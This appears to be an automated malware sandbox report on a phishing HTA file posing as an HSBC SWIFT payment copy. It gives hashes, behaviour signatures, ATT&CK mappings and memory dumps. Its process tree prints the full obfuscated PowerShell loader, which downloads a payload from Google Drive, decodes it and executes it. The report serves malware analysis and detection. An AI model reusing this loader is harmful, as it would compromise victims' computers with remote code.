413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f

General

Target

25042024 - HSBC Payment SWIFT COPY PAGES.hta
Size

8KB
MD5

faf3762a6e994f4e79d87d817ce62e16
SHA1

85517ba95bed123d356ce026192d913acf6e97ea
SHA256

413edb098cc00d5456c57941a10faf691f8ca3266ae6d8538636b7ea9bcf660f
SHA512

b7522895d2d72d1980184b0d0dc19d1e22082311bfbbe77ead3e9039c650dd5527970c86a74982c87e05255d18e7c6b016187747b4b99be0b155ca351ecf1c92
SSDEEP

192:pFH6Jy7ik4n2AV2PP0PFDQlHfCe4z9dfzWQ/0EY2ibM0wTstRA:pj472EPFy/Ce4znfzWQ//JiM5Te+

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

Processes:

flow	ioc
18	drive.google.com
19	drive.google.com
20	drive.google.com
9	drive.google.com
11	drive.google.com
16	drive.google.com
17	drive.google.com
3	drive.google.com
14	drive.google.com
15	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1136 powershell.exe
1136 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1136 powershell.exe

pid	process
1136	powershell.exe
1136	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1136	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

mshta.exepowershell.exe

description	pid	process	target process
PID 1728 wrote to memory of 1136	1728	mshta.exe	powershell.exe
PID 1728 wrote to memory of 1136	1728	mshta.exe	powershell.exe
PID 1728 wrote to memory of 1136	1728	mshta.exe	powershell.exe
PID 1136 wrote to memory of 3648	1136	powershell.exe	cmd.exe
PID 1136 wrote to memory of 3648	1136	powershell.exe	cmd.exe
PID 1136 wrote to memory of 3648	1136	powershell.exe	cmd.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\25042024 - HSBC Payment SWIFT COPY PAGES.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Brlet = 1;$Monimolite='Substrin';$Monimolite+='g';Function Rhd($Chefkonsulenten121){$Containerterminalernes=$Chefkonsulenten121.Length-$Brlet;For($Salgsprisens=5; $Salgsprisens -lt $Containerterminalernes; $Salgsprisens+=(6)){$Udseenderne+=$Chefkonsulenten121.$Monimolite.Invoke($Salgsprisens, $Brlet);}$Udseenderne;}function Tonitas($Nontraditional){&($Ublufrdigheden) ($Nontraditional);}$Artighedernes=Rhd ',aiwaMBegyno E,sizFllesiRejemlSy,telRabidaC,tal/ D.li5 etap. U.va0Serv, crypt( InevW,ymphiJagtlnNeurodMatemo HoldwLa gusa,tin GeneoNUnfulT Whar Reakt1Snowi0Celti.Spott0B.udu;Landm enegWbalaciTurnenNonv,6Esche4Fibon;Prona Pr.olxB.gge6Arsoi4provi;Brave BravirPirogv D,st:Briga1Ce,ha2Innov1Kal.e.Corra0Ri ua)Morch Au.tGDdsk eLattecSa.thkE.hedoFagle/ ldol2S,and0Expos1 Skol0 Ta,m0 Bred1Forme0Belus1M lle SlanFIndefiHimmerpublie,ikotfunimpoSaplex Burg/Sto.s1Brnds2Sysse1Campa. .ope0 hit ';$Kilobytenes=Rhd 'Barn UAnonys SpineTandkrClo.k-Dest,ANeg,ig MigreSkannnTongutSorts ';$phytoplasm=Rhd 'Hexachdiannt M,trtPr sapStadss U,sa:K.rul/Macro/,iktadPenalrUdenriAhartvKontreFedtf.Mas.eg LovroListeob rtlgSpumelOsteoePolar.blawicKommuoKred m ank/HeteruSydslc Gal,?FagbleCosm,xShorepAnirioCo mirIntrotcanyo=RushidC prio TykhwlucernPrerelSondaomaalra KurtdFlatb&Silkei OrdtdAuks =Permu1 FolkQPreplHRennewS,rog_SolacaStvekt darmmmaureuGenerRStartrK nku5,ntomETas.n1 miliv Mou,GExodexTuretGBrugeJU,loamCubatPenfouo Fem,1ModifMUlyste Tint0TallodSemandRecryFAutenYPokke8bu zazttnesSApurp ';$Kildematerialet=Rhd 'eva o>Passa ';$Ublufrdigheden=Rhd 'ince.iProd,e IntexRid,h ';$Festered='Anstandsdames';Tonitas (Rhd 'Sa grS BrileMortitSermo- R avCEndomoJurisnRadiltBagd.eSerranEkspotAffal Let a-sn skPOversau mantFagkohRavin KalorT hand: Viru\VerdeO ArgaxMaguay MusldXanth.RudimtIglooxTotaltSursy v,rs-C wboVAftviaFuldelAfskiuMiliteDepra Bodyb$UforsF pdee Pre sMedi.t prvee RattrS iseeRumfad.ifto;Pelsd ');Tonitas (Rhd 'MultiiF.rfif owe Bangl(FeststIdiose M,mssSabaetRgfor-CulotpExempaEmbrotSkudlh Neds perp.TMalp : odes\SalveOLoxi,x V.siyTopkod Graa.GenertHuarax TsentRgrel) C ly{ LommeMetodxko.ceiEffe.tDimmi},lndv;Khaju ');$Switchgear = Rhd '.nkteeIn.arc optihcasefoEpide S,age%Stoppa A mipMoresp ,robdd capaVaaretVittiaSclat%Smleh\AdverSValeupalkydeDebitc vnhiGensbfSymboiCholecrafleeShortr Spati.ullan Thacg Pav eTrekanPolymsWordi.PageufBegotr onnoiOph.h P oth& .eal& Nitr Censoe opsocForsthL dseoAntic mal.c$Stigm ';Tonitas (Rhd 'Apast$Kemikg L,cklStrowoAfspnb S raaKommalFikse:Unsp PArginrEffemoPljerlbomb,e AnnetValetaM camr,ntikiVam esHalfneP,odurAffileA,dittJackf=Miser(SvartcClawemLa,dsdMonoc Flagd/,uculcLa.df Sysle$feltpSAb trwEnsuliHo.dntPilmbcSortshOver,gC.paieBoghoaFo,laragren)Jaal. ');Tonitas (Rhd 'Balan$Brookg,jemslU.arioU,affbary naStewalBukse:De.ilTEnergy oncurNonpoa avetnKunstnAnthee toplr KatanPycniePe un=El ct$Sa ompHirakhcra.ey au.ot ForsoStormpclotwlDihysaOver,sChar mSells.Ther.s kirspTobaklSnowbiSalontUnyac(Trstr$HypnoK TlpeiQuoinl Su,cdPisseeCytopmSknk,aPronet Sl.vedisburHiccuiCa.quaStrablNulpue AarltRumli) Bred ');$phytoplasm=$Tyrannerne[0];Tonitas (Rhd 'pinch$StrukgTrommlExt.aoSp.lobInteraSkridlV,deo:SvensM Bedee ,ekrnQuiz aCacocc ,eltefor.em SemieSpirin .erct oman=GodkeNSoot e.loatwFo.sk-SatinOSkillbStbegjForsie.ntiscVag ptSnort I,raeS HuskyRe.arsTyvektUn ureHabsbmNomin. VelsNDerboeGemaltKirte.Nyta,W S,nie AadsbGalocC arrelUd ggi CabeeDisprnRe litLejes ');Tonitas (Rhd 'Meses$DokumMCo.mae Krikn KhamaI.eloc Artee sagtmFundae lagenPropht,ulga.OracuH Te.se Op,ea AfskdlinseeSbebor B.ddsRigdo[Flade$UnbedKBut kiHelullMarjaoarmodbornityUntumt .raveSkoinnJuareePlantsBoxma]Polle=lopho$VioliATredjrBa bitOve,siFredlgScybahVariaeunpoidReckoebe lyr AbesnBristeRe.nisBli d ');$Middleclass136=Rhd 'In.anMReg seBlyannInstraStrancDesideNonsumAns,aeOm ednProjetCof,c.A,watDWo,bioori.nwcinn.nAfgiflbowero Absta rgbod PostFCentriTodaglDri ze alpe(Inost$ Affop Ansph,ncomyDideptSibyloslyngp sk,rlOver,aGlirisForgrmPrp,r,appro$JustiP p.oda.innahCompas ernieCymatrpatar)Milje ';$Middleclass136=$Proletariseret[1]+$Middleclass136;$Pahser=$Proletariseret[0];Tonitas (Rhd 'Unmec$ArtergBehaglSpaewoOverfb.rigcaIdeollM.zed: FeriB NumirPenalomachib,hainySkolegUnve.g.eucoedominrTransiDulbee billrTorc,n CockeModer=Outri(OppusTSinapeUn,masBomset ,nth- InteP,tninaCiviltMad.phAnnon elta$K.rniP.uvgeafrkaphBoblesFlk,eeK nser P ag)Heart ');while (!$Brobyggerierne) {Tonitas (Rhd ' Pric$Fordag AminlR,vivoBenevb .vera BemelZagg.:.fterSK bebcBov,iaUdvaenSquamdUnimpaKamfelViruli GrubsA.alieChaindDocum=Smidi$ CarctCyrtor UndsuBirose Micr ') ;Tonitas $Middleclass136;Tonitas (Rhd ' Sl.tSSlipotOrdinabeev rSupertUnsyn- Ser.SSt.enlpereueSkriveSpo,lpMachi Dan,e4 Ult ');Tonitas (Rhd 'Inter$Regnsgbl trl Runao JapibKata.aHomogl tolt:Au unBU skir Ua mo.trikbSenneySpretgpleasgObjekeBe.gerHul,ti PrioeUnrevrCanann Unr e Hell=S.yge( La eTDogsle,ersks ubritTresp-SkattPDgnceaPenoct Mat.h Desp ,nbru$Dowe.PBayamaCounth FremsBaad,eGafferMeria)Preob ') ;Tonitas (Rhd 'Bejap$proz.gMalnulsydl.oQuavebEndama triqlAgave:Hi.cuGVenviaV,albrGravla ski,=Morte$Belusg ClaslSkabeofunktbPos paindefl Acro:CheriNDelo oBrollnM tincNipcho OctanbistavKrim,e H mor CoresKof,aa KampbUdsvelMische Syd,nTampee Pla,sFersksSy le2anton2Uafst6Sorge+ Chri+S,inb%Compl$ men,TCystoyLsesarStanga s.ann S,rannytese C.iar Gia,nEndosePhoni.,lpincB.rtlo Spl u ArtinnonsytS bdi ') ;$phytoplasm=$Tyrannerne[$Gara];}Tonitas (Rhd 'Spec $ .avogTehanlS.ympoNunnibGiganauncaulSmigr:HenstPVaskehKloroialacrlPosteaAuritnGipsytKampuhNov.brNat ooMe.chpR dikiSkalls.kureiDrgl,nKom.igSt.rt2Orran2stlan3Offic Tunne=Kredi togebG neume.rdsetT ade-F,ankCU,dero An,in Ny tt Ver eMentanKn,ghtApofe Impal$ Mi.cPSmugra Subuh TempsB lboe Twi.rsk ot ');Tonitas (Rhd ',rlys$Wilsog ArgulSt deohousebSpyetaIfrerlHippa:Bor,hT hvidoS.irrb tigaIncaskcinepsE,versO,tanoWinfivUnpinsSupe eInternFanglsRvrdi Ly.st=Solmi .nde[Ud.anSOversy ntersHyloit.uldeeStdfamWe.gh.NoretCSav roServinStr kvS ntaeJaiwhrAndelttrass] Spik: P.ra: AbsoFSemiorOpposoSto,kmTosdeBUdlodaStyklsunpoae Livs6konge4DeligS Soult chevr Des.iArbejnEuropg Unde(Propy$ ImpePEllokhA,omii Faral Tr paFavntnTetrat PhyshFi,mir ForsoUngu,pFirevi OrgusSammeiGliganBorg gEmbra2Septi2 Skra3extra) Fien ');Tonitas (Rhd ' nraa$Non.ngHydrolBondeoUn,abb,ubloa RummlDe ic:GalilE Ca.asEnfrao IncupProtehVeltiaB.dutgSolfeo VarisTr,dat Ind,oUnderm Collysorte Yderi=Holle ,odsp[immorSIce,ayBeg.dsUbehetLovfoeArre.m S in. FrutTpsalteKvab.xcentrtLinan.Frie,EIsaben SigmcAnch oDe,ogd ShapiRor enProcegUnlot] Dry.:Pregr:AbnegAEut,pSBureaCUntowIOrnamIU,tra.CoappGUricaeKlodstove.mSWallitScenerTobakiCha,tnAvisugLangs(Soff $ KalmToverboNoncobAntimaSan,sk mestsInvers Lapio UdenvC,itisRednie Regin ikkes ende)Frem, ');Tonitas (Rhd 'Gldsv$ BssegHerbel ortaoPraksbMorseaHyperlmarik:Ro teA,illinTr agdInt reOvercrIroniiVeter=Psitt$VentrEdrm,esOphngo Npb p ,ktehSt.ppaRepugg S.oco GnavsNeol.tFakkeoSp.ogmPh.naySamit.Diaces ctiou re.lbKontrsS irttDisperTimotiSva mnF,ispgDiete(Pseud2Stude9B.ite8Die,e6Scrim8 Regn2Bi io,Unos,2O,ers8 Unfe9Fejes9spryd1 Stor) Me l ');Tonitas $Anderi;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificeringens.fri && echo $"
3⤵
PID:3648

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hejrftck.xyw.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1136-18-0x0000000006960000-0x000000000697E000-memory.dmp

Filesize
120KB

Download
memory/1136-28-0x00000000030B0000-0x00000000030C0000-memory.dmp

Filesize
64KB

Download
memory/1136-17-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/1136-4-0x0000000005CA0000-0x00000000062C8000-memory.dmp

Filesize
6.2MB

Download
memory/1136-5-0x00000000059C0000-0x00000000059E2000-memory.dmp

Filesize
136KB

Download
memory/1136-7-0x0000000006340000-0x00000000063A6000-memory.dmp

Filesize
408KB

Download
memory/1136-3-0x00000000030B0000-0x00000000030C0000-memory.dmp

Filesize
64KB

Download
memory/1136-6-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/1136-1-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/1136-2-0x00000000030B0000-0x00000000030C0000-memory.dmp

Filesize
64KB

Download
memory/1136-20-0x0000000007FC0000-0x000000000863A000-memory.dmp

Filesize
6.5MB

Download
memory/1136-19-0x00000000069A0000-0x00000000069EC000-memory.dmp

Filesize
304KB

Download
memory/1136-21-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

Filesize
104KB

Download
memory/1136-22-0x0000000007A10000-0x0000000007AA6000-memory.dmp

Filesize
600KB

Download
memory/1136-23-0x0000000007970000-0x0000000007992000-memory.dmp

Filesize
136KB

Download
memory/1136-24-0x0000000008BF0000-0x0000000009194000-memory.dmp

Filesize
5.6MB

Download
memory/1136-26-0x0000000070D60000-0x0000000071510000-memory.dmp

Filesize
7.7MB

Download
memory/1136-27-0x00000000030B0000-0x00000000030C0000-memory.dmp

Filesize
64KB

Download
memory/1136-0-0x0000000003030000-0x0000000003066000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing